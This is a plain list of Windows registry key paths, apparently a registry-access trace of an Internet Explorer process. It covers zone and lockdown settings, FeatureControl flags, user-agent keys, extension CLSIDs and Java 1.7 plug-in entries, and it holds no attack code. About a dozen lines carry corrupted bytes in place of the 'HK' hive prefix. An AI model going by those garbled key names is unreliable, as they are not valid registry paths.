HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_LOCAL_MACHINE\Software\Microsoft\Feeds
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Feeds\UrlCacheVersion
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\iexplore.exe
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\Feature_Enable_Compat_Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\Feature_Enable_Compat_Logging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\xe7\xb0\x90\xc8\xacEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Pre Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\*
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\AllSitesCompatibilityMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IntranetCompatibilityMode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\UnattendLoaded
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StatusBarWeb
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\StatusBarWeb
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable Browser Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoBandCustomize
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Passport\LowDAMap
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\LowMic
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AlwaysShowMenus
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AlwaysShowMenus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
\xe1\xa9\x98\xc8\xacEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{18df081c-e8ad-4283-a596-fa578c2ebdc3}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\AcroIEHelperShim.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Time
HKEY_CLASSES_ROOT\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\InprocServer32
\xe1\xa9\x98\xc8\xacEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\LoadTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{b4f3a835-0e21-4959-ba22-42b3008e02ff}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\URLREDIR.DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\LoadTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{dbc80044-a445-435b-bc74-9c25c1c588a9}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DBC80044-A445-435B-BC74-9C25C1C588A9}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\jp2ssv.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Time
HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\10.0.0
\xe6\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\10.0.0\UseNewJavaPlugin
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment\1.7.0
\xe6\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\1.7.0\JavaHome
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32
\xe6\x8c\xb8\xc7\xaeEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32
\xe6\x8c\xb8\xc7\xaeEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32
\xe6\x8c\xb8\xc7\xaeEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32
\xe6\x8c\xb8\xc7\xaeEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32
